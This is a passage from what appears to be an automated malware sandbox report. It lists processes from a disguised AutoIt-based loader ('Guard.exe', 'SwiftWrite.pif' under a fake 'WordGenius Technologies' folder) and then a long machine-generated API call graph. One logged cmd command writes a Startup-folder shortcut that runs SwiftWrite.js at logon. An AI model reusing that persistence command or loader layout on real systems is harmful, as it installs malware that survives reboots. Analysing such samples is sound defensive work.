                                                                    Path:C:\Users\Public\Guard.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                    Imagebase:0x6b0000
                                                                    File size:893'608 bytes
                                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 8%, ReversingLabs
                                                                    Has exited:false

                                                                    Target ID:21
                                                                    Start time:03:13:23
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                    Imagebase:0x790000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:03:13:23
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:03:13:32
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                    Imagebase:0x7ff69fa90000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:24
                                                                    Start time:03:13:33
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                    Imagebase:0x290000
                                                                    File size:893'608 bytes
                                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 8%, ReversingLabs
                                                                    Has exited:false


                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:5.9%
                                                                      Total number of Nodes:1426
                                                                      Total number of Limit Nodes:40
CreatePopupMenu 98350->98354 98357 7ff7c0e55eae KillTimer 98351->98357 98358 7ff7c0e9c1b8 98351->98358 98383 7ff7c0e74610 98352->98383 98365 7ff7c0e55f0b 98353->98365 98366 7ff7c0e55e5f 98353->98366 98353->98370 98354->98349 98356 7ff7c0e9c255 98394 7ff7c0e72c44 47 API calls Concurrency::wait 98356->98394 98379 7ff7c0e55d88 98357->98379 98362 7ff7c0e9c1f7 MoveWindow 98358->98362 98363 7ff7c0e9c1bd 98358->98363 98359 7ff7c0e9c2c3 98359->98343 98359->98349 98362->98349 98367 7ff7c0e9c1c2 98363->98367 98368 7ff7c0e9c1e4 SetFocus 98363->98368 98391 7ff7c0e55f3c 26 API calls __scrt_fastfail 98365->98391 98366->98343 98376 7ff7c0e55d88 Shell_NotifyIconW 98366->98376 98367->98366 98372 7ff7c0e9c1cb 98367->98372 98368->98349 98370->98343 98392 7ff7c0e6ede4 8 API calls 98372->98392 98374 7ff7c0e55f1f 98374->98349 98377 7ff7c0e9c280 98376->98377 98395 7ff7c0e56258 98377->98395 98380 7ff7c0e55d99 __scrt_fastfail 98379->98380 98381 7ff7c0e55de4 98379->98381 98382 7ff7c0e55db8 Shell_NotifyIconW 98380->98382 98390 7ff7c0e57098 DeleteObject DestroyWindow Concurrency::wait 98381->98390 98382->98381 98384 7ff7c0e746db 98383->98384 98385 7ff7c0e7461a __scrt_fastfail 98383->98385 98384->98349 98406 7ff7c0e572c8 98385->98406 98387 7ff7c0e746a2 KillTimer SetTimer 98387->98384 98388 7ff7c0e74660 98388->98387 98389 7ff7c0ebaaa1 Shell_NotifyIconW 98388->98389 98389->98387 98390->98349 98391->98374 98392->98349 98393->98356 98394->98366 98396 7ff7c0e56287 __scrt_fastfail 98395->98396 98468 7ff7c0e561c4 98396->98468 98399 7ff7c0e5632d 98401 7ff7c0e5634e Shell_NotifyIconW 98399->98401 98402 7ff7c0e9c644 Shell_NotifyIconW 98399->98402 98403 7ff7c0e572c8 6 API calls 98401->98403 98404 7ff7c0e56365 98403->98404 98404->98370 98405->98359 98407 7ff7c0e573bc Concurrency::wait 98406->98407 98408 7ff7c0e572f4 98406->98408 98407->98388 98428 7ff7c0e598e8 98408->98428 98410 7ff7c0e57303 98411 7ff7c0e9cdfc LoadStringW 98410->98411 98412 7ff7c0e57310 98410->98412 98414 7ff7c0e9ce1e 98411->98414 98431 
7ff7c0e57cf4 98412->98431 98416 7ff7c0e5e0a8 4 API calls 98414->98416 98415 7ff7c0e57324 98417 7ff7c0e9ce30 98415->98417 98418 7ff7c0e57336 98415->98418 98424 7ff7c0e5734f __scrt_fastfail wcscpy 98416->98424 98442 7ff7c0e57c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98417->98442 98418->98414 98419 7ff7c0e57343 98418->98419 98441 7ff7c0e57c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98419->98441 98422 7ff7c0e9ce3c 98422->98424 98443 7ff7c0e571f8 98422->98443 98426 7ff7c0e573a3 Shell_NotifyIconW 98424->98426 98425 7ff7c0e9ce63 98427 7ff7c0e571f8 4 API calls 98425->98427 98426->98407 98427->98424 98429 7ff7c0e74c68 4 API calls 98428->98429 98430 7ff7c0e59918 98429->98430 98430->98410 98432 7ff7c0e57d0d 98431->98432 98433 7ff7c0e9d2c8 98431->98433 98436 7ff7c0e57d24 98432->98436 98439 7ff7c0e57d51 98432->98439 98454 7ff7c0e5dda4 98433->98454 98435 7ff7c0e9d2d3 98453 7ff7c0e57e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98436->98453 98438 7ff7c0e57d2f memcpy_s 98438->98415 98439->98435 98440 7ff7c0e74c68 4 API calls 98439->98440 98440->98438 98441->98424 98442->98422 98444 7ff7c0e5721c 98443->98444 98447 7ff7c0e9cd0c 98443->98447 98445 7ff7c0e57274 98444->98445 98450 7ff7c0e9cd66 memcpy_s 98444->98450 98463 7ff7c0e5b960 98445->98463 98449 7ff7c0e74c68 4 API calls 98447->98449 98448 7ff7c0e57283 memcpy_s 98448->98425 98449->98450 98451 7ff7c0e74c68 4 API calls 98450->98451 98452 7ff7c0e9cdda memcpy_s 98451->98452 98453->98438 98455 7ff7c0e5ddc7 memcpy_s 98454->98455 98456 7ff7c0e5dda9 98454->98456 98455->98435 98456->98455 98458 7ff7c0e5a7c0 98456->98458 98459 7ff7c0e5a7ed 98458->98459 98460 7ff7c0e5a7dd memcpy_s 98458->98460 98461 7ff7c0e9e7da 98459->98461 98462 7ff7c0e74c68 4 API calls 98459->98462 98460->98455 98462->98460 98464 7ff7c0e5b981 98463->98464 98467 7ff7c0e5b976 memcpy_s 98463->98467 98465 7ff7c0e74c68 4 API calls 
98464->98465 98466 7ff7c0e9ef2a 98464->98466 98465->98467 98467->98448 98469 7ff7c0e9c5f8 98468->98469 98470 7ff7c0e561e0 98468->98470 98469->98470 98471 7ff7c0e9c602 DestroyIcon 98469->98471 98470->98399 98472 7ff7c0ecad94 39 API calls wcsftime 98470->98472 98471->98470 98472->98399 98473 7ff7c0e78fac 98474 7ff7c0e7901c 98473->98474 98475 7ff7c0e78fd2 GetModuleHandleW 98473->98475 98490 7ff7c0e8b9bc EnterCriticalSection 98474->98490 98475->98474 98479 7ff7c0e78fdf 98475->98479 98477 7ff7c0e79026 98481 7ff7c0e790a0 98477->98481 98486 7ff7c0e8aa8c 30 API calls 98477->98486 98489 7ff7c0e790cb 98477->98489 98478 7ff7c0e8ba10 _isindst LeaveCriticalSection 98480 7ff7c0e790f0 98478->98480 98479->98474 98491 7ff7c0e79164 GetModuleHandleExW 98479->98491 98482 7ff7c0e790fc 98480->98482 98485 7ff7c0e79118 11 API calls 98480->98485 98483 7ff7c0e790b8 98481->98483 98488 7ff7c0e8ada4 75 API calls 98481->98488 98484 7ff7c0e8ada4 75 API calls 98483->98484 98484->98489 98485->98482 98486->98481 98488->98483 98489->98478 98492 7ff7c0e7918e GetProcAddress 98491->98492 98493 7ff7c0e791b5 98491->98493 98492->98493 98496 7ff7c0e791a8 98492->98496 98494 7ff7c0e791c5 98493->98494 98495 7ff7c0e791bf FreeLibrary 98493->98495 98494->98474 98495->98494 98496->98493 98497 7ff7c0eaf890 98506 7ff7c0e5e18c 98497->98506 98499 7ff7c0eaf8a9 98500 7ff7c0eaf915 Concurrency::wait 98499->98500 98512 7ff7c0e72ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98499->98512 98504 7ff7c0eb03e1 Concurrency::wait 98500->98504 98514 7ff7c0ed34e4 77 API calls 3 library calls 98500->98514 98502 7ff7c0eaf8f6 98502->98500 98513 7ff7c0ed1464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98502->98513 98507 7ff7c0e5e1a7 98506->98507 98508 7ff7c0e5e1c2 98506->98508 98515 7ff7c0e5ee20 5 API calls Concurrency::wait 98507->98515 98510 7ff7c0e5e1af 98508->98510 98516 7ff7c0e5ee20 5 API calls Concurrency::wait 98508->98516 98510->98499 98512->98502 
98514->98504 98515->98510 98516->98510 98517 7ff7c0e62bf8 98520 7ff7c0e5ed44 98517->98520 98519 7ff7c0e62c05 98521 7ff7c0e5ed75 98520->98521 98528 7ff7c0e5edcd 98520->98528 98522 7ff7c0e63c20 300 API calls 98521->98522 98521->98528 98524 7ff7c0e5eda8 98522->98524 98526 7ff7c0e5edfe 98524->98526 98529 7ff7c0e5ee20 5 API calls Concurrency::wait 98524->98529 98525 7ff7c0eaa636 98526->98519 98528->98526 98530 7ff7c0ed34e4 77 API calls 3 library calls 98528->98530 98529->98528 98530->98525 98531 7ff7c0e62c17 98534 7ff7c0e614a0 98531->98534 98533 7ff7c0e62c2a 98535 7ff7c0e614d3 98534->98535 98536 7ff7c0eabe31 98535->98536 98538 7ff7c0eabdd1 98535->98538 98539 7ff7c0eabdf2 98535->98539 98557 7ff7c0e614fa __scrt_fastfail 98535->98557 98582 7ff7c0ee8f48 300 API calls 3 library calls 98536->98582 98541 7ff7c0eabddb 98538->98541 98538->98557 98542 7ff7c0eabe19 98539->98542 98580 7ff7c0ee9a88 300 API calls 4 library calls 98539->98580 98579 7ff7c0ee9514 300 API calls 98541->98579 98581 7ff7c0ed34e4 77 API calls 3 library calls 98542->98581 98543 7ff7c0e61884 98570 7ff7c0e72130 45 API calls 98543->98570 98549 7ff7c0e61815 98549->98533 98551 7ff7c0e61898 98551->98533 98554 7ff7c0e72130 45 API calls 98554->98557 98557->98543 98557->98549 98557->98554 98558 7ff7c0e61a30 45 API calls 98557->98558 98559 7ff7c0e61799 98557->98559 98562 7ff7c0eabfe4 98557->98562 98563 7ff7c0e63c20 300 API calls 98557->98563 98566 7ff7c0e5e0a8 4 API calls 98557->98566 98569 7ff7c0e5ef9c 46 API calls 98557->98569 98571 7ff7c0e720d0 45 API calls 98557->98571 98572 7ff7c0e55af8 300 API calls 98557->98572 98573 7ff7c0e75114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98557->98573 98574 7ff7c0e735c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98557->98574 98575 7ff7c0e74f0c 34 API calls _onexit 98557->98575 98576 7ff7c0e750b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98557->98576 98577 
7ff7c0e736c4 77 API calls 98557->98577 98578 7ff7c0e737dc 300 API calls 98557->98578 98583 7ff7c0e5ee20 5 API calls Concurrency::wait 98557->98583 98584 7ff7c0ebac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98557->98584 98558->98557 98559->98549 98586 7ff7c0ed34e4 77 API calls 3 library calls 98559->98586 98585 7ff7c0ee93a4 77 API calls 98562->98585 98563->98557 98566->98557 98569->98557 98570->98551 98571->98557 98572->98557 98574->98557 98575->98557 98577->98557 98578->98557 98579->98549 98580->98542 98581->98536 98582->98557 98583->98557 98584->98557 98585->98559 98586->98559 98587 7ff7c0eae263 98588 7ff7c0eae271 98587->98588 98606 7ff7c0e62680 98587->98606 98588->98588 98589 7ff7c0e62856 98590 7ff7c0e629c8 PeekMessageW 98590->98606 98591 7ff7c0e626da GetInputState 98591->98590 98591->98606 98593 7ff7c0ead181 TranslateAcceleratorW 98593->98606 98594 7ff7c0e62a33 PeekMessageW 98594->98606 98595 7ff7c0e62a1f TranslateMessage DispatchMessageW 98595->98594 98596 7ff7c0e628b9 timeGetTime 98596->98606 98597 7ff7c0ead2bb timeGetTime 98654 7ff7c0e72ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98597->98654 98603 7ff7c0e63c20 300 API calls 98603->98606 98604 7ff7c0ed34e4 77 API calls 98604->98606 98606->98589 98606->98590 98606->98591 98606->98593 98606->98594 98606->98595 98606->98596 98606->98597 98606->98603 98606->98604 98607 7ff7c0e62b70 98606->98607 98614 7ff7c0e666c0 98606->98614 98648 7ff7c0e72de8 98606->98648 98653 7ff7c0e62e30 300 API calls 2 library calls 98606->98653 98655 7ff7c0ed3a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98606->98655 98656 7ff7c0eea320 300 API calls Concurrency::wait 98606->98656 98608 7ff7c0e62b96 98607->98608 98610 7ff7c0e62ba9 98607->98610 98657 7ff7c0e62050 98608->98657 98677 7ff7c0ed34e4 77 API calls 3 library calls 98610->98677 98611 7ff7c0e62b9e 98611->98606 98613 7ff7c0eae55c 98639 
7ff7c0e6673b memcpy_s Concurrency::wait 98614->98639 98615 7ff7c0eb1fac 98812 7ff7c0eeab30 300 API calls Concurrency::wait 98615->98812 98618 7ff7c0eb1fbe 98618->98606 98620 7ff7c0e66c0f 98621 7ff7c0e66c3d 98620->98621 98622 7ff7c0eb1fc9 98620->98622 98809 7ff7c0e5ee20 5 API calls Concurrency::wait 98621->98809 98813 7ff7c0ed34e4 77 API calls 3 library calls 98622->98813 98626 7ff7c0e66c4a 98810 7ff7c0e71fcc 300 API calls 98626->98810 98628 7ff7c0e66d40 9 API calls 98628->98639 98630 7ff7c0e74c68 4 API calls 98630->98639 98631 7ff7c0eb20c1 98640 7ff7c0e66b15 98631->98640 98816 7ff7c0ed34e4 77 API calls 3 library calls 98631->98816 98632 7ff7c0e66c78 98811 7ff7c0e6e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98632->98811 98635 7ff7c0e63c20 300 API calls 98635->98639 98636 7ff7c0eb2032 98814 7ff7c0ed34e4 77 API calls 3 library calls 98636->98814 98638 7ff7c0e5e0a8 4 API calls 98638->98639 98639->98615 98639->98620 98639->98622 98639->98626 98639->98628 98639->98630 98639->98631 98639->98632 98639->98635 98639->98636 98639->98638 98639->98640 98683 7ff7c0ed8ea0 98639->98683 98716 7ff7c0ed7e48 98639->98716 98750 7ff7c0ed8e98 98639->98750 98783 7ff7c0eef160 98639->98783 98788 7ff7c0ed5b80 98639->98788 98794 7ff7c0eef0ac 98639->98794 98797 7ff7c0ed63dc 98639->98797 98802 7ff7c0e75114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98639->98802 98803 7ff7c0e5ec00 98639->98803 98808 7ff7c0e750b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98639->98808 98815 7ff7c0ee8d98 49 API calls Concurrency::wait 98639->98815 98640->98606 98649 7ff7c0e72e0d 98648->98649 98651 7ff7c0e72e2a 98648->98651 98649->98606 98650 7ff7c0e72e5b IsDialogMessageW 98650->98649 98650->98651 98651->98649 98651->98650 98652 7ff7c0eb9d94 GetClassLongPtrW 98651->98652 98652->98650 98652->98651 98653->98606 98654->98606 98655->98606 98656->98606 98658 7ff7c0e63c20 300 API calls 
98657->98658 98659 7ff7c0e620a8 98658->98659 98660 7ff7c0e6212d 98659->98660 98663 7ff7c0e62552 98659->98663 98668 7ff7c0e62244 98659->98668 98671 7ff7c0ead06f 98659->98671 98673 7ff7c0e623cb memcpy_s 98659->98673 98674 7ff7c0e622a5 memcpy_s 98659->98674 98660->98611 98662 7ff7c0ead08d 98665 7ff7c0e74c68 4 API calls 98663->98665 98664 7ff7c0ead036 98680 7ff7c0e5ee20 5 API calls Concurrency::wait 98664->98680 98665->98673 98667 7ff7c0e74c68 4 API calls 98667->98674 98668->98673 98678 7ff7c0e61ce4 301 API calls Concurrency::wait 98668->98678 98669 7ff7c0ead062 98681 7ff7c0e5ee20 5 API calls Concurrency::wait 98669->98681 98682 7ff7c0ed34e4 77 API calls 3 library calls 98671->98682 98673->98664 98676 7ff7c0ed34e4 77 API calls 98673->98676 98679 7ff7c0e54a60 300 API calls 98673->98679 98674->98667 98674->98673 98676->98673 98677->98613 98678->98674 98679->98673 98680->98669 98681->98671 98682->98662 98684 7ff7c0eda680 98683->98684 98692 7ff7c0eda71a 98684->98692 98854 7ff7c0e5834c 98684->98854 98686 7ff7c0eda6f3 98686->98639 98688 7ff7c0e5d4cc 48 API calls 98690 7ff7c0eda6d0 98688->98690 98689 7ff7c0eda7fd 98882 7ff7c0ed1864 6 API calls 98689->98882 98863 7ff7c0e56838 98690->98863 98692->98686 98692->98689 98696 7ff7c0eda770 98692->98696 98694 7ff7c0eda805 98883 7ff7c0ecb334 98694->98883 98817 7ff7c0e5d4cc 98696->98817 98697 7ff7c0eda6e6 98697->98686 98879 7ff7c0e57ab8 98697->98879 98701 7ff7c0eda7ee 98836 7ff7c0ecb3a8 98701->98836 98703 7ff7c0eda7a7 98704 7ff7c0e598e8 4 API calls 98703->98704 98706 7ff7c0eda7b5 98704->98706 98709 7ff7c0e5e0a8 4 API calls 98706->98709 98708 7ff7c0eda778 98708->98701 98708->98703 98710 7ff7c0eda7c2 98709->98710 98712 7ff7c0e571f8 4 API calls 98710->98712 98711 7ff7c0e57ab8 CloseHandle 98711->98686 98713 7ff7c0eda7d3 98712->98713 98714 7ff7c0ecb3a8 12 API calls 98713->98714 98715 7ff7c0eda7e0 Concurrency::wait 98714->98715 98715->98686 98886 7ff7c0e58314 98715->98886 98717 7ff7c0ed7e79 98716->98717 98718 7ff7c0e59640 4 API calls 
98717->98718 98747 7ff7c0ed7f55 Concurrency::wait 98717->98747 98719 7ff7c0ed7ea6 98718->98719 98721 7ff7c0e59640 4 API calls 98719->98721 98720 7ff7c0e5834c 5 API calls 98722 7ff7c0ed7f99 98720->98722 98723 7ff7c0ed7eaf 98721->98723 98724 7ff7c0e5d4cc 48 API calls 98722->98724 98725 7ff7c0e5d4cc 48 API calls 98723->98725 98726 7ff7c0ed7fab 98724->98726 98727 7ff7c0ed7ebe 98725->98727 98728 7ff7c0e56838 16 API calls 98726->98728 98914 7ff7c0e574ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98727->98914 98730 7ff7c0ed7fba 98728->98730 98732 7ff7c0ed7fbe GetLastError 98730->98732 98736 7ff7c0ed7ff5 98730->98736 98731 7ff7c0ed7ed8 98915 7ff7c0e57c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98731->98915 98734 7ff7c0ed7fd8 98732->98734 98737 7ff7c0e57ab8 CloseHandle 98734->98737 98743 7ff7c0ed7fe5 98734->98743 98735 7ff7c0ed7f07 98735->98747 98916 7ff7c0ecbdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 98735->98916 98738 7ff7c0e59640 4 API calls 98736->98738 98737->98743 98740 7ff7c0ed8035 98738->98740 98740->98743 98918 7ff7c0ec0d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 98740->98918 98741 7ff7c0ed7f17 98742 7ff7c0ed7f1b 98741->98742 98741->98747 98744 7ff7c0e5ec00 4 API calls 98742->98744 98743->98639 98746 7ff7c0ed7f28 98744->98746 98917 7ff7c0ecbab8 8 API calls Concurrency::wait 98746->98917 98747->98720 98747->98743 98749 7ff7c0ed7f31 Concurrency::wait 98749->98747 98751 7ff7c0eda680 98750->98751 98752 7ff7c0e5834c 5 API calls 98751->98752 98758 7ff7c0eda71a 98751->98758 98753 7ff7c0eda6be 98752->98753 98754 7ff7c0e5d4cc 48 API calls 98753->98754 98756 7ff7c0eda6d0 98754->98756 98755 7ff7c0eda7fd 98919 7ff7c0ed1864 6 API calls 98755->98919 98760 7ff7c0e56838 16 API calls 98756->98760 98758->98755 98759 7ff7c0eda6f3 98758->98759 98763 7ff7c0eda770 98758->98763 98759->98639 98762 7ff7c0eda6e2 98760->98762 98761 
7ff7c0eda805 98766 7ff7c0ecb334 4 API calls 98761->98766 98762->98758 98764 7ff7c0eda6e6 98762->98764 98765 7ff7c0e5d4cc 48 API calls 98763->98765 98764->98759 98767 7ff7c0e57ab8 CloseHandle 98764->98767 98772 7ff7c0eda778 98765->98772 98782 7ff7c0eda7e0 Concurrency::wait 98766->98782 98767->98759 98768 7ff7c0eda7ee 98769 7ff7c0ecb3a8 12 API calls 98768->98769 98769->98782 98770 7ff7c0eda7a7 98771 7ff7c0e598e8 4 API calls 98770->98771 98774 7ff7c0eda7b5 98771->98774 98772->98768 98772->98770 98773 7ff7c0e58314 CloseHandle 98775 7ff7c0eda85c 98773->98775 98776 7ff7c0e5e0a8 4 API calls 98774->98776 98775->98759 98778 7ff7c0e57ab8 CloseHandle 98775->98778 98777 7ff7c0eda7c2 98776->98777 98779 7ff7c0e571f8 4 API calls 98777->98779 98778->98759 98780 7ff7c0eda7d3 98779->98780 98781 7ff7c0ecb3a8 12 API calls 98780->98781 98781->98782 98782->98759 98782->98773 98920 7ff7c0eef630 98783->98920 98785 7ff7c0eef1cd 98785->98639 98786 7ff7c0eef182 98786->98785 98988 7ff7c0e5ee20 5 API calls Concurrency::wait 98786->98988 98789 7ff7c0ed5ba5 98788->98789 98790 7ff7c0ed5ba9 98789->98790 98791 7ff7c0ed5be5 FindClose 98789->98791 98792 7ff7c0ed5bd5 98789->98792 98790->98639 98791->98790 98792->98790 98793 7ff7c0e57ab8 CloseHandle 98792->98793 98793->98790 98795 7ff7c0eef630 164 API calls 98794->98795 98796 7ff7c0eef0c2 98795->98796 98796->98639 98798 7ff7c0e5d4cc 48 API calls 98797->98798 98799 7ff7c0ed63f8 98798->98799 99017 7ff7c0ecbdec 98799->99017 98801 7ff7c0ed6404 98801->98639 98804 7ff7c0e5ec1d 98803->98804 98805 7ff7c0eaa5a2 98804->98805 98806 7ff7c0e74c68 4 API calls 98804->98806 98807 7ff7c0e5ec55 memcpy_s 98806->98807 98807->98639 98809->98626 98810->98632 98811->98632 98812->98618 98813->98640 98814->98640 98815->98639 98816->98640 98818 7ff7c0e5d50b 98817->98818 98831 7ff7c0e5d4f2 98817->98831 98819 7ff7c0e5d53e 98818->98819 98820 7ff7c0e5d513 98818->98820 98823 7ff7c0e5d550 98819->98823 98829 7ff7c0ea9cc4 98819->98829 98830 7ff7c0ea9bbc 98819->98830 98889 7ff7c0e7956c 
31 API calls 98820->98889 98890 7ff7c0e74834 46 API calls 98823->98890 98824 7ff7c0ea9cdc 98825 7ff7c0e5d522 98828 7ff7c0e5ec00 4 API calls 98825->98828 98828->98831 98892 7ff7c0e79538 31 API calls 98829->98892 98832 7ff7c0e74c68 4 API calls 98830->98832 98835 7ff7c0ea9c3e Concurrency::wait wcscpy 98830->98835 98831->98708 98833 7ff7c0ea9c0a 98832->98833 98834 7ff7c0e5ec00 4 API calls 98833->98834 98834->98835 98891 7ff7c0e74834 46 API calls 98835->98891 98837 7ff7c0ecb3c8 98836->98837 98838 7ff7c0ecb42a 98836->98838 98839 7ff7c0ecb3d0 98837->98839 98840 7ff7c0ecb41e 98837->98840 98841 7ff7c0ecb334 4 API calls 98838->98841 98843 7ff7c0ecb3f1 98839->98843 98844 7ff7c0ecb3dd 98839->98844 98900 7ff7c0ecb458 8 API calls 98840->98900 98853 7ff7c0ecb410 Concurrency::wait 98841->98853 98898 7ff7c0e5a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98843->98898 98896 7ff7c0e5a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98844->98896 98847 7ff7c0ecb3e2 98897 7ff7c0e74120 6 API calls 98847->98897 98848 7ff7c0ecb3f6 98899 7ff7c0ecb270 6 API calls 98848->98899 98851 7ff7c0ecb3ef 98893 7ff7c0ecb384 98851->98893 98853->98715 98855 7ff7c0e74c68 4 API calls 98854->98855 98856 7ff7c0e58363 98855->98856 98857 7ff7c0e58314 CloseHandle 98856->98857 98858 7ff7c0e5836f 98857->98858 98859 7ff7c0e59640 4 API calls 98858->98859 98860 7ff7c0e58378 98859->98860 98861 7ff7c0e58314 CloseHandle 98860->98861 98862 7ff7c0e58380 98861->98862 98862->98688 98864 7ff7c0e58314 CloseHandle 98863->98864 98865 7ff7c0e5685a 98864->98865 98866 7ff7c0e5687d CreateFileW 98865->98866 98867 7ff7c0e9caa8 98865->98867 98872 7ff7c0e568ab 98866->98872 98868 7ff7c0e9caae CreateFileW 98867->98868 98875 7ff7c0e568d9 98867->98875 98869 7ff7c0e9cae6 98868->98869 98868->98872 98903 7ff7c0e56a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98869->98903 98871 7ff7c0e9caf3 98871->98872 98878 7ff7c0e568e4 98872->98878 98901 7ff7c0e568f4 9 API calls 
98872->98901 98874 7ff7c0e568c1 98874->98875 98902 7ff7c0e56a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98874->98902 98876 7ff7c0ecb334 4 API calls 98875->98876 98875->98878 98876->98878 98878->98692 98878->98697 98904 7ff7c0e582e4 98879->98904 98882->98694 98909 7ff7c0ecb188 98883->98909 98887 7ff7c0e5833d CloseHandle 98886->98887 98888 7ff7c0e5832a 98886->98888 98887->98888 98888->98686 98888->98711 98889->98825 98890->98825 98891->98829 98892->98824 98894 7ff7c0ecb334 4 API calls 98893->98894 98895 7ff7c0ecb399 98894->98895 98895->98853 98896->98847 98897->98851 98898->98848 98899->98851 98900->98853 98901->98874 98902->98875 98903->98871 98905 7ff7c0e58314 CloseHandle 98904->98905 98906 7ff7c0e582f2 Concurrency::wait 98905->98906 98907 7ff7c0e58314 CloseHandle 98906->98907 98908 7ff7c0e58303 98907->98908 98910 7ff7c0ecb193 98909->98910 98911 7ff7c0ecb19c WriteFile 98909->98911 98913 7ff7c0ecb208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98910->98913 98911->98715 98913->98911 98914->98731 98915->98735 98916->98741 98917->98749 98918->98743 98919->98761 98922 7ff7c0eef671 __scrt_fastfail 98920->98922 98921 7ff7c0e5d4cc 48 API calls 98923 7ff7c0eef74d 98921->98923 98922->98921 98989 7ff7c0e5e330 98923->98989 98925 7ff7c0eef759 98926 7ff7c0eef762 98925->98926 98927 7ff7c0eef840 98925->98927 98929 7ff7c0e5d4cc 48 API calls 98926->98929 98928 7ff7c0eef87d GetCurrentDirectoryW 98927->98928 98930 7ff7c0e5d4cc 48 API calls 98927->98930 98931 7ff7c0e74c68 4 API calls 98928->98931 98932 7ff7c0eef777 98929->98932 98933 7ff7c0eef85c 98930->98933 98934 7ff7c0eef8a7 GetCurrentDirectoryW 98931->98934 98935 7ff7c0e5e330 4 API calls 98932->98935 98936 7ff7c0e5e330 4 API calls 98933->98936 98937 7ff7c0eef8b5 98934->98937 98938 7ff7c0eef783 98935->98938 98939 7ff7c0eef868 98936->98939 98940 7ff7c0eef8f0 98937->98940 99002 7ff7c0e6f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98937->99002 98941 7ff7c0e5d4cc 48 API calls 
